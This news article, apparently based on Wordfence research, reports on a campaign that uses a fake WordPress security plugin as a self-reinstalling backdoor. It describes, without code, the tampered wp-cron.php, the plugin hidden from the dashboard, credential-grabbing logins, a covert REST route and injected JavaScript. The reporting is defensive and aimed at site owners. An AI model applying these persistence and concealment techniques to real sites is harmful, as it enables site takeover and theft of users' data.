Hackers are using a fake WordPress security plugin to silently hijack websites, reinstall itself after deletion, and give attackers hidden admin access.
What happened
A new malware campaign is targeting WordPress websites using a plugin that masquerades as a security tool, tricking site owners into installing it. According to cybersecurity researchers at Wordfence, the plugin grants attackers persistent access, remote code execution capabilities, and JavaScript injection, all while hiding itself from the WordPress plugin dashboard to avoid detection.
The campaign was first uncovered during a routine site cleanup in January 2025, where Wordfence analysts discovered a tampered wp-cron.php file. This file silently creates and activates the backdoor plugin, typically named WP-antymalwary-bot.php.
Going deeper
Hackers are targeting WordPress sites using fake plugins with names like addons.php, wpconsole.php, and wp-performance-booster.php. These plugins install malware that keeps coming back, even if deleted, because a file called wp-cron.php is secretly modified to reinstall it every time someone visits the site.
Researchers believe the attack starts either through stolen FTP logins or security weaknesses in the web hosting account. The malware’s command server is based in Cyprus, and the overall method looks very similar to a known supply chain attack from June 2024.
Once installed, the fake plugin runs a check to make sure everything is in place, then opens up a hidden login route for the attackers. If they send the right secret password, the malware grabs admin usernames and passwords from the database and gives them full access to the site.
The plugin also creates a secret pathway (a custom REST API route) that lets the attackers run commands like inserting malicious code, clearing plugin caches, or editing theme files without logging in normally. Newer versions even inject hidden JavaScript into the site’s header, most likely to redirect users to scam pages, serve spam ads, or commit click fraud.
What was said
Wordfence reported: “We highlighted an interesting piece of malware that masquerades as a legitimate plugin. It allows attackers to log in to compromised sites, infect theme headers, and maintain persistent access. This malware may signal that threat actors are beginning to use AI to create more convincing, legitimate-looking malicious code.”
Researchers also warned that its stealth tactics and ability to reinstall itself after deletion make it especially dangerous.
The big picture
For site owners, this attack reinforces the need for strict plugin hygiene, regular file integrity checks, and close monitoring of key system files. As WordPress continues to dominate as a website platform, its popularity makes it an attractive target for attackers seeking scalable entry points into the web ecosystem.
FAQs
Why do attackers target WordPress plugins?
Plugins are a common entry point because they have deep access to site functions and are often less scrutinized than core files.
How do attackers hide malicious plugins from the dashboard?
They use custom code to unregister the plugin from WordPress’s plugin list, making it invisible to admins during routine checks.
What makes wp-cron.php a useful tool for attackers?
It runs scheduled tasks automatically, which attackers exploit to silently reinstall malware during normal site activity.
Can AI really help attackers make better malware?
Yes, AI can assist in writing more realistic code and evading detection by mimicking legitimate plugin behavior.
What’s the risk if I ignore a suspicious plugin or file?
You could be handing full control of your site to hackers, risking SEO damage, stolen user data, or being part of a broader botnet.
Farah Amod
